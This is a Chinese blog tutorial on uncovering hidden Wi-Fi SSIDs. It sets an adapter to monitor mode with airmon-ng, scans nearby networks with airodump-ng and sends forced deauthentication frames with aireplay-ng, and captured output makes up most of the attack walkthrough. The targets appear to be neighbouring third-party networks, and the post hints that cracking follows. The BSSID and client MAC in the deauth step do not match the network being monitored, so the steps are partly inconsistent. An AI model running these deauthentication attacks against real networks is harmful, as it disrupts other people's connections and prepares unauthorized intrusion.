隐藏wifi ssid获取

最近玩一些wifi的game,意识到隐藏wifi的速度可能会好一些,索性玩一玩

环境准备

┌─[✗]─[root@parrot]─[~]
└──╼ #airmon-ng check kill
┌─[✗]─[root@parrot]─[~]
└──╼ #airmon-ng start wlan0
┌─[✗]─[root@parrot]─[~]
└──╼ #airodump-ng wlan0mon
 CH 10 ][ Elapsed: 1 min ][ 2019-02-03 16:20                                         
                                                                                                                                                                                             
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                
 68:DB:54:xx:xx:xx  -47      212       15    0   4  130  WPA2 CCMP   PSK  <length:  0>                                                                                                                                                       
 30:FC:68:xx:xx:xx   -1        0        1    0   5  -1   WPA              <length:  0>                                                                                                       
 28:F3:66:xx:xx:xx   -1        0       11    0  11  -1   WPA              <length:  0>                                                                                                                                                                                             
 48:7D:2E:xx:xx:xx  -54       69        1    0  11  405  WPA2 CCMP   PSK  yangxiao                                                                                                           
 38:83:45:xx:xx:xx  -55      108      284    0  11   65  WPA2 CCMP   PSK  <length:  0>                                                                                                       
 1C:AB:34:xx:xx:xx  -55       85      365    6  11  130  WPA2 CCMP   PSK  H3C_6B7374                                                                                                         
 88:25:93:xx:xx:xx  -56       60        0    0   6  405  WPA2 CCMP   PSK  <length:  0>                                                                                                       
 50:BD:5F:xx:xx:xx  -58       51        0    0   1  405  WPA2 CCMP   PSK  <length:  0>                                                                                                       
 34:CE:00:xx:xx:xx  -64       89        0    0   6  54e. OPN              lumi-acpartner-v2_miap13b6                                                                                         
 B0:95:8E:xx:xx:xx  -65       49       30    0   6  405  WPA2 CCMP   PSK  yuhuole2                                                                                                           
 2C:CC:E6:xx:xx:xx  -67        6        0    0   9  130  WPA2 CCMP   PSK  CU_tqev                                                                                             
                                                                                  

像这些带有length:xx的就是隐藏wifi,名称我也不知道,不过没关系

可以查看下自己的网卡Mac(上次重装系统后好像变了,神奇)

eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 80:fa:5b:xx:xx:xx  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

索性随便选取一条

 CH 12 ][ Elapsed: 12 s ][ 2019-02-03 16:24                                         
                                                                                                                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                              
 68:DB:54:xx:xx:xx  -52  67     5462     4941  650   4  130  WPA2 CCMP   PSK   <length:  0>                                                                                                 

实战

┌─[root@parrot]─[~]
└──╼ #airodump-ng -c 4 --bssid 68:DB:54:xx:xx:xx wlan0mon

会显示如下,下面出来BSSID才可以识别隐藏wifi的ssid

 CH  4 ][ Elapsed: 14 mins ][ 2019-02-03 17:06 ][ fixed channel wlan0mon: 6                                         
                                                                                                                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                             
 68:DB:54:xx:xx:xx  -52  67     5462     4941  650   4  130  WPA2 CCMP   PSK  <length:  0>                                                                                                            
                                                                                                                                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                   
                                                                                                                                                                                             
 68:DB:54:xx:xx:xx  70:D9:23:xx:xx:xx  -69    1e- 6      2      388                                                                                                                           
 68:DB:54:xx:xx:xx  08:4A:CF:xx:xx:xx  -87    0e- 1      0      106                                                                                                                           
 68:DB:54:xx:xx:xx  38:6E:A2:xx:xx:xx  -70    1e- 1e     0       10      

然后

┌─[✗]─[root@parrot]─[~]
└──╼ #aireplay-ng -0 30 -a 38:83:45:xx:xx:xx -c 80:FA:5B:xx:xx:xx wlan0mon
16:49:11  Waiting for beacon frame (BSSID: 38:83:45:5E:E0:A2) on channel 11
16:49:12  Sending 64 directed DeAuth (code 7). STMAC: [80:FA:5B:22:0F:6E] [ 0|59 ACKs]
16:49:12  Sending 64 directed DeAuth (code 7). STMAC: [80:FA:5B:22:0F:6E] [ 0|55 ACKs]
16:49:13  Sending 64 directed DeAuth (code 7). STMAC: [80:FA:5B:22:0F:6E] [ 4|50 ACKs]
16:49:13  Sending 64 directed DeAuth (code 7). STMAC: [80:FA:5B:22:0F:6E] [ 4|57 ACKs]
。。。。。。

多尝试几次,然后对方的ssid就出来了,剩下就很简单了

 CH  4 ][ Elapsed: 14 mins ][ 2019-02-03 17:06 ][ fixed channel wlan0mon: 6                                         
                                                                                                                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                             
 68:DB:54:xx:xx:xx  -52  67     5462     4941  650   4  130  WPA2 CCMP   PSK  001                                                                                                            
                                                                                                                                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                   
                                                                                                                                                                                             
 68:DB:54:xx:xx:xx  70:D9:xx:xx:xx:xx  -69    1e- 6      2      388                                                                                                                           
 68:DB:54:xx:xx:xx  38:6E:xx:xx:xx:xx  -84    0e- 6      0     4176                                                                                                                           
 68:DB:54:xx:xx:xx  08:4A:xx:xx:xx:xx  -87    0e- 1      0      106                                                                                                                           
 68:DB:54:xx:xx:xx  38:6E:A2:xx:xx:xx  -70    1e- 1e     0       10      

坑点

airodump-ng和aireplay-ng需要同时打开,如果失败的话多aireplay-ng多执行几次
airodump-ng下边有ssid才可以,否则不行(可能是实验问题)

网络恢复

┌─[root@parrot]─[~]
└──╼ #ifconfig wlan0mon down
┌─[root@parrot]─[~]
└──╼ #service  network-manager start
┌─[root@parrot]─[~]
└──╼ #reboot
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,937评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,503评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,712评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,668评论 1 276
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,677评论 5 366
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,601评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,975评论 3 396
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,637评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,881评论 1 298
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,621评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,710评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,387评论 4 319
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,971评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,947评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,189评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 44,805评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,449评论 2 342

推荐阅读更多精彩内容